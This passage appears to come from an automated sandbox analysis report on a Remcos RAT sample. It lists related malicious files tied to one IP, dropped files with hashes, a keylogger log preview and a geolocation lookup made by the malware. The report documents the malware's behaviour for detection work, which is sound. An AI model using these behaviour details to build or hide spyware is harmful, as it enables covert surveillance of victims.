                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50
                                                                                                                                                                                                                                          SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 178.237.33.50

                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                          C:\ProgramData\graias\logs.dat

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8476
                                                                                                                                                                                                                                          Entropy (8bit):3.5602841485909233
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:xgy4eOnLq4TXjLq48OLq4dCImLq433CLq4ILq4g4Lq4mFBLq4neLq4NMLq4EMLqr:MuCuCuRu/uVuAuHuTuzuYubu6u4
                                                                                                                                                                                                                                          MD5:2692EF8BCE89A06E76A4C47FD28EBFA1
                                                                                                                                                                                                                                          SHA1:0859D5695DB371BE69163BFD4BEA124365E5ADD9
                                                                                                                                                                                                                                          SHA-256:3299D7091D38906B07B21844F0D68AF619A1970A8ED5E04A479C26B7BAA396C3
                                                                                                                                                                                                                                          SHA-512:165236A479962FA1D4FC740BECB306C564FBA2B814B55DA665DCCFCD9F25EDE2C34F1202D951F96C4AAF85ACB8EF6998BE7C77591DB6A4E9EB6A93F014E5A93B
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\graias\logs.dat, Author: Joe Security
                                                                                                                                                                                                                                          Preview:....[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.1. .R.u.n.].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.2. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.3. .R.u.n.].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.4. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.5. .U.n.t.i.t.l.e.d. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.8. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].....[.W.i.n.].r.....[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.0.9. .R.u.n.].........[.2.0.2.5./.0.1./.0.3. .1.8.:.0.2.:.1.0. .U.n.t.i.t.l.e.d. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.2.0.2.5./.0.1./.0.3. .1.8.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\D3DSCache\c6e1bc7b336e2cfe\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65552
                                                                                                                                                                                                                                          Entropy (8bit):0.01237149505889543
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:N+/lGlll/l/lXp9ZjrPBY06llcllXwiEl/lRP:m0dPBY0O6/giEXJ
                                                                                                                                                                                                                                          MD5:27754E2DB48BC95315A62B86FD981E5A
                                                                                                                                                                                                                                          SHA1:1568ECDB144BE9F8DBC488BC4944D89E31058EA5
                                                                                                                                                                                                                                          SHA-256:84560889FB3E1F4E9F6302D1A73D62C85E0F7544DCC1255328B8643A0BFCCA09
                                                                                                                                                                                                                                          SHA-512:FC8BF7FE7489942015F32F2D93DE1B3F3A07E08AAEBC872E89E5C9C20A21449D9BB7E4576695C6C81411BDABD9A96F658F6CD4A1CC502D7045B9DB8568C422F1
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..uA........................................f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\D3DSCache\c6e1bc7b336e2cfe\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:R:R
                                                                                                                                                                                                                                          MD5:F49655F856ACB8884CC0ACE29216F511
                                                                                                                                                                                                                                          SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                                                                                                                                                                                          SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                                                                                                                                                                                          SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:EERF

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\D3DSCache\c6e1bc7b336e2cfe\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                                                                                                                                          File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                          Entropy (8bit):0.020296169267305913
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:9llpl5d2DJqojBdl+Sli5l2GkNl0lR9TNlktt/llaia9sVQMm4qNw:c9q0Bn+SkyGkNlUetb2Hsqi
                                                                                                                                                                                                                                          MD5:AE2B45690B7A2B278AD387D9AB374E16
                                                                                                                                                                                                                                          SHA1:1822D3444AF5A00E882B9D1483CCE518FF57FD09
                                                                                                                                                                                                                                          SHA-256:F617DFE9D4C2FE77DC462523FF803A1C7D9E23E014D63F64D2202DFC519BFEE7
                                                                                                                                                                                                                                          SHA-512:36D490650F9FB4280A83B9869F54C8C4B2AA317652397726107B44AF344E377118A6306DE71BC2D4DE012CDDD8E8A7C157F6164D619F315D264841E36137A01D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:................>...(....x:no.&A.e.u~+..C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.d.x.d.i.a.g...e.x.e.................................(...p.DJ!.IL.....Z.F.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\graias.exe.log

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1216
                                                                                                                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iGhDjzEiDU.exe.log

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\iGhDjzEiDU.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1216
                                                                                                                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                          Entropy (8bit):5.019205124979377
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                                                          MD5:B62617530A8532F9AECAA939B6AB93BB
                                                                                                                                                                                                                                          SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                                                                                                                                                                                                          SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                                                                                                                                                                                                          SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                                                          Entropy (8bit):5.379460230152629
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZSUyus:fLHyIFKL3IZ2KRH9OugEs
                                                                                                                                                                                                                                          MD5:C0097F75360CA66B65DB5A4E62501B4D
                                                                                                                                                                                                                                          SHA1:B6EE5A4442E2C932AF07B472D8F4EB5DC1F2EBD3
                                                                                                                                                                                                                                          SHA-256:18E34BD63BEFE61C852C04D8C9294201F91B905D50D3BBFC7411FD598FF8F8AE
                                                                                                                                                                                                                                          SHA-512:64BF0392903A9CF79BF54B82C1CB5E8C8323D746125AA64575D2BB9B4343F55FE9DF6D347B8BE0F43ED1470DBA9E46B46F7D6BCEF6047E565544529DBA517693
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04b42xsn.hyj.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vt5cwvv.0r2.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz3u5ilo.z0o.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_md5bsqcp.aso.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogwhplav.jo4.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvp41p30.fed.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqgfxdzx.ftz.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wppcnxt1.5go.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\bhvC4F2.tmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):15728640
                                                                                                                                                                                                                                          Entropy (8bit):0.10805027086476268
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                                                                                                                                                                                                                          MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                                                                                                                                                                                                                          SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
